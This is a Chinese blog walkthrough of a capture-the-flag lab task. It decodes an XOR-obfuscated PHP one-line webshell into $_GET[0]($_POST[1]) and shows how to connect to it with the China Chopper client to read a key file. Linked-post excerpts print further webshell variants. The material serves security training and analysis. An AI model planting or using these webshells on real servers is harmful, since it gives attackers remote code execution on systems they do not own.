墨者学院-PHP代码分析溯源(第1题)

最新推荐文章于 2022-10-25 17:10:11 发布

JimWu95

最新推荐文章于 2022-10-25 17:10:11 发布

阅读量418

点赞数

本文链接：https://blog.csdn.net/weixin_39998158/article/details/100540737

版权

PHP代码分析溯源(第1题)

难易程度:★
题目类型:代码审计
使用工具:FireFox浏览器、菜刀

1.访问网页，得到php代码

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

2.使用在线编辑器中编辑php语句

$_++为1
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/")为_GET
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|")为_POST

在这里插入图片描述

!$_是0
构成一句话木马$_GET[0]($_POST[1])

3.打开菜刀构造url为http://219.153.49.228:42918/b.php?0=assert，密码为1
在这里插入图片描述
4.在html文件夹中找到key文件。

5.打开key文件获取key。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

JimWu95

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

墨者学院 - PHP代码分析溯源(第1题)

多崎巡礼的博客

07-30

870

1、“^”为异或运算符。在PHP中，两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串。 2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作，在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。 3、$__=("`"^"?").(":"^"}").("%.

墨者学院 - WebShell代码分析溯源(第5题)

多崎巡礼的博客

08-02

842

一个个看，，，找到该文件，经典的回调函数形式菜刀连接， ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680 <?php error_reporting(0); call...

参与评论您还未登录，请先登录后发表或查看评论

PHP代码分析溯源(第1题)

mozhe_的博客

05-25

1681

靶场地址：https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码，经分析：1、“^”为异或运算符。在PHP中，两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作，在PHP中...

墨者 - PHP代码分析溯源(第1题)

吃肉唐僧的博客

07-12

649

进入环境，发现是php源码用在线php代码调试工具调试（要用echo输出，将${$__}[!$_](${$___}[$_]);删掉，否则报错）结合输出，${$__}[!$_](${$___}[$_]); 的意思大概是 <?php $_GET[0]($_POST[1])?> 这是php一句话木马的变种其他更多变种参考：https://blog.csdn.net/x...

墨者学院-php分析溯源

JimWu的博客

09-04

359

php分析溯源难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、菜刀 1.打开靶场，下载源码。 2.打开文件夹，发现shell.php。 3.打开文件，发现一句话木马。参数a的值给md5加密了，解密后为1Q2W3E。 3个=为全等，不仅比较值，而且还比较值的类型。 4.打开菜刀连接，构造url为 http://219.153.49.228:47779/shell.php?a...

[ 墨者学院 ] 代码审计 —— PHP代码分析溯源（第1题）

weixin_30908707的博客

06-20

288

0x01.题目描述：背景介绍某日，在某公司做IT维护的朋友给安全工程师"墨者"发了一个PHP文件，说在其WEB服务器发现多了一个b.php文件，目前不确定这个文件是开发留下的正常文件还是攻击者上传的木马后门，希望"墨者"能够帮他分析一下。实训...

墨者学院 - WebShell代码分析溯源(第11题)

多崎巡礼的博客

08-06

744

<?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){ //若get到的1不为空且1=GET.fPZ87的话执行下面操作 $_=@fopen('t.php', 'a'); ...

墨者学院 - WebShell代码分析溯源(第4题)

多崎巡礼的博客

08-02

720

唉让我如此信任的工具在这道题上栽了跟头。。。嗯，以后的结果仅供参考。下载源代码，在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马且获得其密码，通过菜刀连接菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...

墨者学院 - WebShell代码分析溯源(第3题)

多崎巡礼的博客

07-31

817

$g是个数组，根据ASCll码对应表可以得到$g[1]='s'，chr('116')='t'，那么$gg=assert，@$gg($_POST[joker])不就是assert($_POST[joker])，组成了我们常见的一句话脚本运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key <?php...

墨者学院靶场之PHP代码分析溯源(第1题)

weixin_30892037的博客

06-11

175

申请靶场环境后点开题目一段奇怪的PHP代码因为我自己电脑重装了win10系统，php+apache+mysql的环境本地主机觉得没必要弄了，于是我们用在线的PHP编码（百度一下到处都是）复制进去以"；"来排个格式运行下，报错。看看源码，"$_" "$__" "$___" 这三个是变量名，我们用echo输出下内容连在一起了，但是可以确定 ...

墨者学院-PHP代码分析溯源(第3题)

JimWu的博客

09-04

305

PHP代码分析溯源(第3题) 难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、记事本 1.打开靶场，下载网页源代码。 2.用文本打开源代码，分析源代码找出密码。 ①我们分析后，发现当密码小于等于9和大于等于1时，都会返回false。所以我们可以知道密码应该不是数字，而是英文字母。 ②当我们看到return $number == '54975581388’时，我们知道在php...

墨者学院-php代码分析溯源

臭nana的博客

12-14

388

打开发现代码是base64+压缩的编码最简单的方式是将eval变成echo，其他方法得到echo `$_REQUEST[a]`;; ?> 构造payload:?a=ls，发现key文件用了ls就明白这是肯定不是在windows系统，所以不能用file_get_contents 两种方法： 1.使用cat不能直接读取出来，但可以查看源代码，在前面加view-...

墨者PHP代码分析溯源(第4题)题解

zr1213159840的博客

01-16

657

首先打开页面，有个提示，而且还有段代码仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码，通过末尾的等于能看出来这是一段base64的解码，然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩，那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev

一句话木马的变形

qq_45751902的博客

10-25

1630

这个函数原本是利用正则表达式替换符合条件的字符串，但是这个函数有一个功能——可执行命令。使用方法：先用浏览器访问，生成新的文件"hello.php",再连接"hello.php"。这里是base64解密函数，"YXNzZXJ0"是assert的base64加密。第三行使用了变量函数$a，变量储存了函数名eval，便可以直接用变量替代函数名。，按照PHP的格式，表达式在两个“/”之间。把用户传递的数据生成一个函数fun()，然后再执行fun()。利用函数生成文件，第一个参数是文件名，第二个参数是文件的内容。

墨者学院sql注入 x-f